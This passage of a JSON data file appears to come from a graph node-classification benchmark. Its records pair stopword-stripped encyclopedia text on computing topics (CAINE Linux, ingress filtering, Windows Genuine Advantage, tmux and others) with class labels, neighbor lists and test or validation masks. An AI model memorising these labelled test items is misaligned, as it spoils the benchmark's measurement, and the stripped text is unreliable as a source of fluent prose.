    "text": "CAINE_Linux:caine linux caine linux stands computer aided investigative environment italian linux live distribution started digital forensics project caine professional open source forensic platform integrates software tools modules along powerful scripts graphical interface environment operational environment designed intent provide forensic professional tools required perform digital forensic investigate process preservation collection examination analysis caine live linux distribution booted removable media flash drive optical disk run memory also installed onto physical virtual system live mode caine operate data storage objects without boot supporting operating system latest version 9.0 boot uefi/uefi+secure legacy bios allowing caine used information systems boot older operating systems e.g windows nt newer platforms linux windows 10 caine based ubuntu 16.04 64-bit using linux kernel 4.4.0-97 caine system requirements run live disc similar ubuntu 16.04 2 ghz dual core processor better 2 gb system memory run physical system virtual machine environment vmware workstation caine linux distribution numerous software applications scripts libraries used graphical command line environment perform forensic tasks caine perform data analysis data objects created microsoft windows linux unix systems one key forensic features version 9.0 sets block devices default read-only mode write-blocking critical methodology ensure disks subject writing operations operating system forensic tools ensures attached data objects modified would negatively impact digital forensic preservation caine provides software tools support database memory forensic network analysis file system image analysis ntfs fat/exfat ext2 ext3 hfs iso 9660 possible via command line graphic desktop examination linux microsoft windows unix platforms built-in caine import disk images raw dd expert witness/advanced file format may obtained using tools included caine another platform encase forensic tool kit tools included caine linux distribution include",
    "neighbors": [
      9762,
      5284,
      645,
      7525,
      842,
      1515,
      11182,
      8976,
      5492,
      2901,
      2494
    ],
    "mask": "None"
  },
  {
    "node_id": 2232,
    "label": 2,
    "text": "Apple_Configurator:apple configurator apple configurator application developed apple inc. available free download mac app store first launched march 2012 replaces iphone configuration utility application allows mass-configuration ios devices iphone ipad business educational organizations provides remote management administrator help set maintain standard configuration software across number devices",
    "neighbors": [
      9732,
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      6539,
      9100,
      9109,
      1439,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Test"
  },
  {
    "node_id": 2233,
    "label": 9,
    "text": "GNU_cflow:gnu cflow gnu cflow flow graph generator part gnu project reads collection c source files generates c flow graph external references uses sources n't need run program initially implementation unix utility cflow cflow unix command generating c-language flowgraph besides gnu implementations cflow like one tru64 unix",
    "neighbors": [
      2050,
      2180,
      11654,
      4493,
      1939,
      802,
      3618,
      7983,
      1459,
      5555,
      823,
      9148,
      10687,
      10822,
      5703,
      5833,
      8147,
      3674,
      2010,
      10464,
      6369,
      9579,
      8304,
      1394,
      8436,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2234,
    "label": 2,
    "text": "Infinispan:infinispan infinispan distributed cache key-value nosql data store software developed red hat java applications embed library use service wildfly non-java applications use remote service tcp/ip infinispan successor jboss cache project announced 2009 typical use-cases infinispan include infinispan also used academia research framework distributed execution storage",
    "neighbors": [
      2339,
      6277,
      1385,
      4811,
      5677,
      10734,
      9455,
      5872,
      11343,
      2804,
      2901,
      9144,
      5047,
      5560,
      3518
    ],
    "mask": "Test"
  },
  {
    "node_id": 2235,
    "label": 2,
    "text": "Tizen_Association:tizen association tizen association formerly limo linux mobile foundation non-profit technology consortium organization dedicated creating tizen first truly open hardware-independent linux-based mobile operating system smartphone mobile devices mission limo foundation create open linux-based software platform use industry produce mobile devices balanced transparent contribution process enabling ecosystem differentiated products applications services governance open transparent leadership decision making shared founding members motorola nec ntt docomo panasonic mobile communications samsung electronics vodafone work result limo platform work integrated mobile phone products nec panasonic samsung later combined tizen platform members tizen association phones using limo include end september 2011 announced linux foundation meego totally replaced tizen mobile operating system project 2012 tizen new free open source linux-based operating-system released first quarter 2012 intel samsung collaboration limo foundation assisting meego developers pointed lead development new software platform using third-party developer frameworks primarily built html5 web standards october 2012 limo website traffic redirected tizen.org",
    "neighbors": [
      5824,
      4225,
      8355,
      6276,
      11391,
      4011,
      7857,
      5938,
      2259,
      9237,
      823,
      3162,
      1083,
      10303
    ],
    "mask": "Test"
  },
  {
    "node_id": 2236,
    "label": 2,
    "text": "Singularity_(software):singularity software singularity free cross-platform open-source computer program performs operating-system-level virtualization also known containerization one main uses singularity bring containers reproducibility scientific computing high-performance computing hpc world need reproducibility requires ability use containers move applications system system using singularity containers developers work reproducible environments choosing design complete environments easily copied executed platforms singularity began open-source project 2015 team researchers lawrence berkeley national laboratory led gregory kurtzer developed initial version released bsd license end 2016 many developers different research facilities joined forces team lawrence berkeley national laboratory development singularity singularity quickly attracted attention computing-heavy scientific institutions worldwide two years row 2016 2017 singularity recognized hpcwire editors one five new technologies watch 2017 singularity also first place category ″best hpc programming tool technology″ 2018 based data entered voluntary basis public registry singularity user base estimated greater 25,000 installations includes users academic institutions ohio state university michigan state university well top hpc centers like texas advanced computing center san diego supercomputer center oak ridge national laboratory singularity able support natively high-performance interconnects infiniband intel omni-path architecture opa similar support infiniband intel opa devices singularity support pcie-attached device within compute node graphic accelerators singularity also native support open mpi library utilizing hybrid mpi container approach openmpi exists inside outside container features make singularity increasingly useful areas machine learning deep learning data-intensive workloads applications benefit high bandwidth low latency characteristics technologies hpc systems traditionally already resource management job scheduling systems place container runtime environments must integrated existing system resource manager using enterprise container solutions like docker hpc systems would require modifications software singularity seamlessly integrates many resource managers including",
    "neighbors": [
      3969,
      6150,
      2058,
      4238,
      8466,
      2710,
      1435,
      1823,
      546,
      2212,
      6438,
      295,
      10537,
      7983,
      2864,
      7349,
      7733,
      823,
      9525,
      5049,
      9655,
      318,
      5697,
      5702,
      1480,
      1101,
      8909,
      7248,
      1362,
      7507,
      8147,
      2645,
      10971,
      2910,
      10851,
      9320,
      1513,
      5356,
      5612,
      3055,
      8439,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2237,
    "label": 3,
    "text": "Haswell_(microarchitecture):haswell microarchitecture haswell codename processor microarchitecture developed intel fourth-generation core successor ivy bridge microarchitecture intel officially announced cpus based microarchitecture june 4 2013 computex taipei 2013 working haswell chip demonstrated 2011 intel developer forum haswell uses 22 nm process intel also introduced low-power processors designed convertible hybrid ultrabooks designated suffix haswell cpus used conjunction intel 8 series chipsets intel 9 series chipsets intel c220 series chipsets haswell architecture specifically designed optimize power savings performance benefits move finfet non-planar 3d transistors improved 22 nm process node haswell launched three major forms compared ivy bridge around middle 2014 intel released refresh haswell simply titled haswell refresh compared original haswell cpus lineup haswell refresh cpus offer modest increase clock frequencies usually 100 mhz haswell refresh cpus supported intel 9 series chipsets z97 h97 codenamed wildcat point motherboards 8 series chipsets codenamed lynx point usually require bios update support haswell refresh cpus cpus codenamed devil canyon covering i5 i7 k-series skus employ new improved thermal interface material tim called next-generation polymer thermal interface material ngptim improved tim reduces cpu operating temperatures improves overclocking potential something problematic since introduction ivy bridge changes devil canyon cpus include tdp increase 88 w additional decoupling capacitors help smooth outputs fully integrated voltage regulator fivr support vt-d previously limited non-k-series skus tsx another feature brought non-k-series skus august 2014 microcode update disabled tsx due bug discovered implementation following table lists available desktop processors sku suffixes denote first digit model number designates largest supported multi-socket configuration thus e5-26xx v3 models support dual-socket configurations e7-48xx v3 e7-88xx v3 models support quad- eight-socket configurations respectively also e5-16xx/26xx v3 e7-48xx/88xx v3 models integrated gpu lists launched server processors split haswell e3-12xx v3 e5-16xx/26xx v3 e7-48xx/88xx v3 models sku suffixes denote following table lists available mobile processors sku suffixes denote",
    "neighbors": [
      3586,
      7173,
      4108,
      9741,
      5649,
      2088,
      2638,
      597,
      4695,
      1119,
      7783,
      4204,
      8820,
      630,
      4217,
      8325,
      7313,
      8851,
      6804,
      8855,
      9369,
      9391,
      4276,
      5309,
      6339,
      9932,
      5844,
      1260,
      5356,
      5871,
      1776,
      9970,
      3317,
      5883,
      5380,
      11524,
      5386,
      6926,
      4886,
      3352,
      9500,
      1832,
      10548,
      6463,
      833,
      5444,
      9541,
      8552,
      9582,
      4465,
      5503,
      2943,
      3459,
      3973,
      9095,
      4491,
      9611,
      398,
      5523,
      9111,
      10658,
      9126,
      10669,
      4017,
      10675,
      1461,
      1463,
      8125,
      8126,
      1998,
      977,
      2514,
      5073,
      2516,
      2525,
      7134,
      1000,
      7657,
      9707,
      8684,
      10734,
      7151,
      10225,
      499,
      4603
    ],
    "mask": "None"
  },
  {
    "node_id": 2238,
    "label": 4,
    "text": "Sanctum_(company):sanctum company sanctum santa clara california-based information technology company focused application security sanctum credited inventing application security space mid-'90s firewall appshield scanner appscan foresaw need better application-layer security web environments 2003 sanctum merged watchfire company subsequently acquired ibm sanctum founded 1997 perfecto technologies eran reshef gili raanan company released first product appshield summer 1999 company done extensive research application security applying formal methods real life software collaboration turing award winner professor amir penueli early research 1996 1997 led invention parallel teams captcha technology application us patent captcha 2000 company renamed sanctum company backed investors sequoia capital intel capital goldman sachs dlj walden mofet appshield product first product inspect incoming hypertext transfer protocol requests block malicious attacks based dynamic policy composed analyzing outgoing html pages later june 2000 company introduced appscan world first web security vulnerability assessment solution among first clients appscan yahoo bank america",
    "neighbors": [
      4800,
      5636,
      3941,
      2118,
      519,
      8998,
      331,
      2705,
      3323,
      5404,
      4797,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 2239,
    "label": 2,
    "text": "Conectiva:conectiva conectiva company founded august 28 1995 curitiba paraná brazil group friends among arnaldo carvalho de melo pioneer distribution linux open source software brazilian portuguese spanish english latin america besides customized linux distribution latin american market conectiva developed series products additional services directed meet market demand open source tools including books manuals additional software like linux tools embedded systems oem programs applications port training kits revista linux linux magazine addition company provided consulting services training technical support latin america service centers certified partners conectiva also provided development customization professional services worldwide basis team open source software engineers conectiva development team expertise amongst others following areas linux kernel development high availability device drivers xfree86 network protocols firewalling clustering performance analysis optimisation filesystems resource management 24 january 2005 announced mandrakesoft acquired conectiva 1.79 million euro 2.3 million u.s. dollars time 7 april 2005 mandrakesoft announced decision change name parent company mandriva distribution name mandriva linux although brazilian operation would change name conectiva immediately",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      4887,
      10394,
      673,
      3745,
      10530,
      7204,
      9253,
      10149,
      11305,
      7854,
      2738,
      4790,
      823,
      439,
      56,
      59,
      3903,
      3649,
      4673,
      2375,
      4039,
      8907,
      10192,
      6227,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      9324,
      7534,
      2671,
      7920,
      8177,
      9074,
      10860,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "None"
  },
  {
    "node_id": 2240,
    "label": 4,
    "text": "Ingress_filtering:ingress filtering computer networking ingress filtering technique used ensure incoming packets actually networks claim originate used countermeasure various spoofing attacks attacker packets contain fake ip addresses make difficult find source attack technique often used denial-of-service attack primary target ingress filtering networks receive packets networks normally packet contain ip address computer originally sent allows devices receiving network know came allowing reply routed back amongst things except ip addresses used proxy spoofed ip address pinpoint specific user within pool users sender ip address faked 'spoofed characterising spoofing attack disguises origin packets sent example denial-of-service attack holds true proxies although different manner ip spoofing one potential solution involves implementing use intermediate internet gateways i.e. servers connecting disparate networks along path followed given packet filtering denying packet deemed illegitimate gateway processing packet might simply ignore packet completely possible might send packet back sender relaying message illegitimate packet denied host intrusion prevention systems hips one example technical engineering applications help identify prevent and/or deter unwanted unsuspected and/or suspicious events intrusions router implements ingress filtering checks source ip field ip packets receives drops packets packets n't ip address ip address block interface connected may possible end host multi-homed also sends transit network traffic ingress filtering packets coming network filtered network sending send packets originating ip address es end host stub network host router needs filter ip packets source ip private addresses rfc 1918 bogon addresses addresses network address interface network ingress filtering packet filtering technique used many internet service providers try prevent source address spoofing internet traffic thus indirectly combat various types net abuse making internet traffic traceable source network ingress filtering good neighbor policy relies cooperation isps mutual benefit best current practices network ingress filtering documented internet engineering task force bcp 38 bcp 84 defined rfc 2827 rfc 3704 respectively bcp 84 recommends upstream providers ip connectivity filter packets entering networks downstream customers discard packets source address allocated customer many possible ways implementing policy one common mechanism enable reverse path forwarding links customers indirectly apply policy based provider route filtering customers route announcements 2012 one report suggests contrary general opinion lack bcp 38 deployment 80 internet various measures already applying anti-spoofing packet filtering networks",
    "neighbors": [
      4163,
      2947,
      2409,
      4495,
      953,
      9181,
      4414
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2241,
    "label": 3,
    "text": "Control_unit:control unit control unit cu component computer central processing unit cpu directs operation processor tells computer memory arithmetic logic unit input output devices respond instructions sent processor directs operation units providing timing control signals computer resources managed cu directs flow data cpu devices john von neumann included control unit part von neumann architecture modern computer designs control unit typically internal part cpu overall role operation unchanged since introduction control unit cu digital circuitry contained within processor coordinates sequence data movements processor many sub-units result routed data movements various digital circuits sub-units within processor produces manipulated data expected software instruction loaded earlier likely memory controls conducts data flow inside processor additionally provides several external control signals rest computer direct data instructions to/from processor external destinations i.e memory examples devices require cu cpus graphics processing units gpus cu receives external instructions commands converts sequence control signals cu applies data path implement sequence register-transfer level operations precisely control unit cu generally sizable collection complex digital circuitry interconnecting directing many execution units i.e alu data buffers registers contained within cpu cu normally first cpu unit accept externally stored computer program single instruction based cpu instruction set cu decodes individual instruction several sequential steps fetching addresses/data registers/memory managing execution i.e data sent alu i/o storing resulting data back registers/memory controls coordinates cpu inner works properly manipulate data design sequential steps based needs instruction range number steps order execution units enabled thus using program set instructions memory cu configure cpu data flows needed manipulate data correctly instructions results computer could run complete program require human intervention make hardware changes instructions done using punch cards computations stored programmed computers cus invented detailed steps cu dictate cpu interconnecting hardware control signals enable/disable cpu units selected/de-selected unit proper order execution required instruction operation produce desired manipulated data additionally cu orderly hardware coordination properly sequences control signals configures many hardware units comprising cpu directing data also moved changed stored outside cpu i.e memory according instruction objective depending type instruction entering cu order number sequential steps produced cu could vary selection configuration parts cpu hardware utilized achieve instruction objective mainly moving storing modifying data within cpu one feature efficiently uses software instructions control/select/configure computer cpu hardware via cu eventually manipulates program data significant reason modern computers flexible universal running various programs compared 1930s 1940s computers without proper cu often required rewiring hardware changing programs cu instruction decode process repeated program counter incremented next stored program address new instruction enters cu address programs end advanced forms control units manage translation instructions data containing portion several micro-instructions cu manages scheduling micro-instructions selected execution units data channeled changed according execution unit function i.e. alu contains several functions processors control unit may broken additional units instruction unit scheduling unit handle scheduling retirement unit deal results coming instruction pipeline control unit orchestrates main functions cpu carrying stored instructions software program directing flow data throughout computer based upon instructions roughly likened traffic lights systematically control flow cars containing data different locations within traffic grid cpu parks desired parking spot memory address/register car occupants data go building execution unit come back changed way get back car return another location via controlled traffic grid hardwired control units implemented use combinational logic units featuring finite number gates generate specific results based instructions used invoke responses hardwired control units generally faster microprogrammed designs design uses fixed architecture—it requires changes wiring instruction set modified changed architecture preferred reduced instruction set computers risc use simpler instruction set controller uses approach operate high speed however little flexibility complexity instruction set implement limited hardwired approach become less popular computers evolved previously control units cpus used ad-hoc logic difficult design idea microprogramming introduced maurice wilkes 1951 intermediate level execute computer program instructions microprograms organized sequence microinstructions stored special control memory algorithm microprogram control unit unlike hardwired control unit usually specified flowchart description main advantage microprogram control unit simplicity structure outputs controller organized microinstructions easily replaced",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      2638,
      3175,
      8815,
      6268,
      3197,
      7313,
      6815,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2243,
      1735,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      2805,
      10485,
      249,
      1798,
      1801,
      6926,
      6415,
      11539,
      2843,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      8514,
      4423,
      7505,
      9044,
      344,
      3421,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      9599,
      3457,
      3470,
      5518,
      407,
      409,
      10658,
      9126,
      936,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      4030,
      453,
      466,
      1499,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 2242,
    "label": 9,
    "text": "VisSim:vissim vissim visual block diagram program simulation dynamical systems model based design embedded systems visual language developed visual solutions westford massachusetts visual solutions acquired altair august 2015 products rebranded solidthinking embed part solidthinking model based development suite solidthinking embed develop virtual prototypes dynamic systems models built sliding blocks work area wiring together mouse embed automatically converts control diagrams c-code ready downloaded target hardware vissim solidthinking embed uses graphical data flow paradigm implement dynamic systems based differential equations version 8 adds interactive uml omg 2 compliant state chart graphs placed vissim diagrams allows modeling state based systems startup sequencing process plants serial protocol decoding vissim/solidthinking embed used control system design digital signal processing multidomain simulation design includes blocks arithmetic boolean transcendental functions well digital filters transfer functions numerical integration interactive plotting commonly modeled systems aeronautical biological/medical digital power electric motor electrical hydraulic mechanical process thermal/hvac econometric read-only version software vissim viewer available free charge provides way people licensed use vissim run vissim models program intended allow models widely shared preserving model published form viewer execute vissim model allows changes block simulation parameters illustrate different design scenarios sliders buttons may activated included model vissim/c-code add-on generates ansi c code model generates target specific code on-chip devices like pwm adc encoder gpio i2c etc useful development embedded systems behavior controller simulated c-code generated compiled run target debugging vissim supports interactive jtag linkage called hotlink allows interactive gain change plotting on-target variables vissim generated code called efficient readable making well suited development embedded systems vissim author served x3j11 ansi c committee wrote several c compilers addition co-authoring book c. deep understanding ansi c nature resulting machine code compiled key code generator efficiency vissim target small 16-bit fixed point systems like texas instruments msp430 using 740 bytes flash 64 bytes ram small closed-loop pulse-width modulation pwm actuated system well allowing high control sample rates 500 khz larger 32-bit floating point processors like texas instruments 150 mhz f28335 technique simulating system performance off-line generating code simulation known model-based development model-based development embedded systems becoming widely adopted production systems shortens development cycles hardware development way model-driven architecture shortens production cycles software development model building visual way describing situation engineering context instead writing solving system equations model building involves using visual blocks solve problem advantage using models cases problems appear difficult expressed mathematically may easier understand represented pictorially vissim uses hierarchical composition create nested block diagrams typical model would consist virtual plants composed various vissim layers combined necessary custom blocks written c fortran virtual controller added tuned give desired overall system response graphical control element sliders buttons allow control what-if analysis operator training controller tuning although vissim originally designed use control engineers used type mathematical model",
    "neighbors": [
      9345,
      2691,
      7301,
      5129,
      3980,
      15,
      5775,
      8079,
      11413,
      5148,
      7580,
      7326,
      4773,
      7341,
      9133,
      7983,
      2045,
      6962,
      6718,
      68,
      5830,
      5703,
      5833,
      7421,
      11239,
      4840,
      363,
      7148,
      5741,
      1917
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2243,
    "label": 3,
    "text": "Control_store:control store control store part cpu control unit stores cpu microprogram usually accessed microsequencer early types control store took form diode-arrays accessed via address decoders later implemented writable microcode stored form read-only memory called writable control store outputs generally go register prevent race condition occurring register clocked clock signal system running early control stores implemented diode-array accessed via address decoders form read-only memory tradition dates back program timing matrix mit whirlwind first described 1947 modern vlsi processors instead use matrices field-effect transistors build rom and/or pla structures used control processor well internal sequencer microcoded implementation ibm system/360 used variety techniques ccros card capacitor read-only storage model 30 tros transformer read-only storage model 40 bcros balanced capacitor read-only storage model 50 computers built using writable microcode — rather storing microcode rom hard-wired logic microcode stored ram called writable control store wcs computer sometimes called writable instruction set computer wisc many machines experimental laboratory prototypes wisc cpu/16 rtx 32p original system/360 models ibm mainframe read-only control store later system/360 system/370 successor models loaded part microprograms floppy disks dasd writable control store consisting ultra-high speed random-access read-write memory system/370 architecture included facility called initial-microprogram load iml impl could invoked console part power reset por another processor tightly coupled multiprocessor complex permitted ibm easily repair microprogramming defects field even majority control store stored rom computer vendors would often sell writable control store option allowing customers customize machine microprogram vendors e.g. ibm use wcs run microcode emulator features hardware diagnostics commercial machines used writable microcode include burroughs small systems 1970s 1980s xerox processors lisp machines xerox star workstations dec vax 8800 nautilus family symbolics l- g-machines 1980s dec pdp-10 machines stored microcode sram chips 80 bits wide x 2 kwords typically loaded power-on front-end cpu many machines offered user-programmable writable control stores option including hp 2100 dec pdp-11/60 varian data machines v-70 series minicomputers mentec m11 mentec m1 stored microcode sram chips loaded power-on another cpu data general eclipse mv/8000 eagle sram writable control store loaded power-on another cpu wcs offered several advantages including ease patching microprogram certain hardware generations faster access roms could provide user-programmable wcs allowed user optimize machine specific purposes cpu designs compile instruction set writable ram flash inside cpu rekursiv processor imsys cjip fpga reconfigurable computing several intel cpus x86 architecture family writable microcode starting pentium pro 1995 allowed bugs intel core 2 microcode intel xeon microcode fixed software rather requiring entire chip replaced fixes installed linux freebsd microsoft windows motherboard bios control store usually register outputs outputs go back sequencer determine next address go sort register prevent creation race condition designs bits also go register machine work faster execution next microinstruction delayed one cycle register known pipeline register often execution next microinstruction dependent result current microinstruction stable end current microcycle seen either way outputs control store go one big register historically used possible buy eproms register bits chip clock signal determining clock rate cycle time system primarily clocks register",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      6184,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      2638,
      3175,
      8815,
      6268,
      3197,
      7313,
      6815,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      2805,
      10485,
      249,
      1798,
      1801,
      10508,
      6926,
      6415,
      11539,
      8474,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      8514,
      4423,
      2383,
      7505,
      9044,
      11604,
      344,
      1376,
      10603,
      4465,
      10612,
      11637,
      1399,
      10104,
      7033,
      1402,
      9599,
      3457,
      3470,
      5518,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      4030,
      453,
      466,
      1499,
      7134,
      5090,
      995,
      2533,
      7653,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2244,
    "label": 2,
    "text": "Windows_Genuine_Advantage:windows genuine advantage windows genuine advantage wga anti-infringement system created microsoft enforces online validation licensing several microsoft windows operating systems accessing several services windows update downloading windows components microsoft download center windows 7 wga renamed windows activation technologies wga consists two components installable component called wga notifications hooks winlogon validates windows license upon logon activex control checks validity windows license downloading certain updates microsoft download center windows update wga notifications covers windows xp later exception windows server 2003 windows xp professional x64 edition activex control checks windows 2000 professional licenses well wga also advertises latest service pack service pack 3 windows xp requires manual intervention disable previously voluntary became mandatory use services july 2005 despite name actually evaluate integrity security computer wga validation process validates present installation windows license key detected computer hardware determines software licensed microsoft accessible either stand-alone program netscape-compatible web browser plug-in activex control within internet explorer latter relevant attempt access microsoft updates via browser includes following steps activex control downloaded first validation new version available validation performed time user connects microsoft website update windows vista without service packs wga validation failure greater impact addition persistent notification disabling non-critical updates wga also disables windows aero windows defender windows readyboost user given grace period pass validation operating system disabled windows reverts reduced functionality mode behavior however removed service pack 1 windows vista favor prominent notices systems believed unlicensed user installs windows genuine advantage internet explorer add-on installed labeled windows genuine advantage early releases tool could readily disabled ie add-on management feature windows group policy added later updates causing option unavailable default still accessible policy removed july 2006 latest update blocks management means program uses either stand-alone program generate key activex control discover whether license key valid either way internet connection required windows xp wga determines user copy windows unauthorized installed seemingly legitimate media i.e. cd/dvd holographic emblem present real copies windows seems genuine microsoft supply user new cd/dvd however newer versions windows still require user purchase new copy microsoft also offers discounts people want purchase legitimate copy windows valid cd microsoft indicated continue deliver critical security updates automatic updates service well via microsoft download center systems including fail pass validation still continue receive critical security updates company made installation windows genuine advantage requirement use windows update microsoft update websites part sure customers use support resources company aware software unlicensed according microsoft legal run microsoft windows without windows genuine advantage however since non-critical windows updates presented automatic updates installation wga required installation non-critical updates available windows update microsoft download center april 25 2006 microsoft began distributing windows genuine advantage notifications critical update kb905474 windows users windows 7 kb971033 function back 2006 users copies wga believed unlicensed exposed alerts startup login use windows os stating genuine copy windows users legitimate copies supposed see alerts although anyway may 23 2006 microsoft updated program closing forms circumvention reportedly updated may 30 june 6 june 27 2006 though forms circumvention still usable latest versions roll worldwide time dates given earliest dates versions appeared actual version offered places earlier version latest release still possible opt receiving update using show option windows update site windows xp hide option right-click menu windows update control panel windows vista/7/8 addition notifications windows genuine advantage also notify users message version windows xp longer secure users xp operating system using service pack 3 provide link help users update systems new service pack version windows genuine advantage notifications released november 29 2006 changed install process inform user program also set automatically update newer versions windows genuine advantage notifications also informs users may non-genuine version windows windows version n't reported genuine however unlike previous releases started automatically delivered windows machines using four widely distributed product keys latest update version 1.9.0040.0 released march 24 2009 microsoft includes windows genuine advantage validation library several products windows validation tool windows media player 11 check validation windows software version 7 internet explorer longer requires user pass windows genuine advantage test order download install software wga validation library also included microsoft security essentials 2.0 validate windows installation whether legitimate program stop working 30 days failed validation process information used wga library check overuse license keys september 2005 microsoft filed lawsuits number companies sold unauthorized copies software based information users told copyright infringing software windows genuine advantage application may 4 2006 microsoft announced lawsuits allegedly distributing unauthorized copies windows edirectsoftware montana chicago-area resellers nathan ballog easy computers personal firewalls though one embedded windows may alert method wgatray.exe started case outpost firewall identified hidden process wgatray.exe process firewall blocked without apparent problems tool released firewall vendor prevent wga notifications transmitting information one pc windows genuine advantage microsoft collects following data october 20 2008 many users windows xp china received black desktop microsoft introduced wga system chinese language systems effort combat copyright violation extremely common china since majority users china run unlicensed copy windows many users experienced described black screen syndrome operating system changes desktop background black screen well displays constant warning messages users even reported disabling office programs microsoft word powerpoint outlook according various polls carried chinese portals sohu.com qq.com 21cn.com many others large number 60 surveyed chinese internet users hostile microsoft windows genuine advantage wga office genuine advantage oga even wga really make program unusable updates except critical ones downloaded microsoft rather disallowing updating windows vista originally ran reduced-functionality mode found wga compromised made people compare wga time bomb software windows vista sp2 removed behavior reverted nag-only methods windows xp notification tool accused spyware-like behavior phoning home daily basis microsoft subsequently admitted behaviour denied amounted spyware following pressure microsoft announced future tool would phone home every two weeks instead every day microsoft also provided removal instructions pilot version wga despite microsoft sued anti-spyware statutes wga non-disclosed phone home behaviour lawsuit since dismissed wga program produce false positives incorrectly identifying genuine copy windows genuine happen number reasons failed updates etc microsoft established forum help users encountering problems february 2007 sure section added program case incorrect reading according ars technica editorial wga reported around 22 500 million windows computers failing test less 0.5 due unauthorized software balance 20 90 positives related edge cases microsoft refused comment rate pure false positives beyond saying 1 stated around 5 million users affected june 18 2007 news surfaced possible positively validate genuine microsoft product user result able download certain software microsoft official website using internet explorer ies4linux wine running linux without even windows-family system installed october 5 2006 wga failure occurred incorrectly flagging systems non-genuine august 25 2007 microsoft wga servers suffered outage resulting many legitimate copies windows xp vista marked counterfeit issue solved 12 hours later according microsoft fewer 12,000 systems affected worldwide july 18 2008 reports microsoft wga oga servers offline surfaced microsoft later responded offline verification temporarily",
    "neighbors": [
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      10281,
      8753,
      2101,
      10812,
      3648,
      7754,
      10828,
      4173,
      4174,
      9808,
      10839,
      603,
      9819,
      8797,
      1632,
      3170,
      622,
      9839,
      4210,
      7796,
      7290,
      4731,
      10879,
      8328,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      10392,
      7834,
      9377,
      3235,
      4771,
      6820,
      1703,
      5300,
      2749,
      200,
      9420,
      6869,
      2782,
      9442,
      4836,
      4326,
      2279,
      3308,
      5356,
      10993,
      7411,
      3834,
      1791,
      8959,
      11519,
      5380,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      10024,
      3881,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      823,
      10039,
      6972,
      3394,
      3922,
      11605,
      4439,
      5465,
      11103,
      2402,
      4458,
      6506,
      9593,
      2943,
      1417,
      1418,
      5003,
      5004,
      6028,
      11677,
      929,
      11683,
      8103,
      430,
      6062,
      9655,
      440,
      6584,
      1978,
      960,
      5057,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      4074,
      1515,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 2245,
    "label": 2,
    "text": "Tmux:tmux tmux terminal multiplexer unix-like operating systems allows multiple terminal sessions accessed simultaneously single window useful running one command-line program time also used detach processes controlling terminals allowing ssh sessions remain active without visible tmux includes features gnu screen allows users start terminal session clients bound specific physical virtual console multiple terminal sessions created within single terminal session freely rebound one virtual console another session several connected clients tmux notable features tmux included openbsd available package many unix-like operating systems",
    "neighbors": [
      515,
      5251,
      9733,
      9223,
      3976,
      521,
      2825,
      3465,
      1932,
      9735,
      4750,
      10631,
      274,
      7188,
      5397,
      2198,
      7702,
      8725,
      10105,
      6812,
      7847,
      4398,
      6702,
      7983,
      9520,
      1336,
      7356,
      965,
      4423,
      1993,
      8522,
      3659,
      3404,
      5067,
      8778,
      11086,
      5970,
      9946,
      5084,
      7139,
      1637,
      10341,
      4071,
      6120,
      11112,
      8954,
      5230,
      4850,
      5492,
      9204,
      1785,
      6138,
      2045,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 2246,
    "label": 1,
    "text": "Composite_index_(database):composite index database database composite index multi-column index index based several columns",
    "neighbors": [
      10632,
      8201,
      8979,
      2068,
      10389,
      7446,
      2456,
      1049,
      5658,
      5403,
      9631,
      9634,
      4263,
      2344,
      7080,
      10286,
      9397,
      3004,
      10048,
      5953,
      9286,
      2901,
      10326,
      987,
      2780,
      4065,
      9828,
      10471,
      6124,
      2669,
      6383,
      2544,
      10737,
      9075,
      1146
    ],
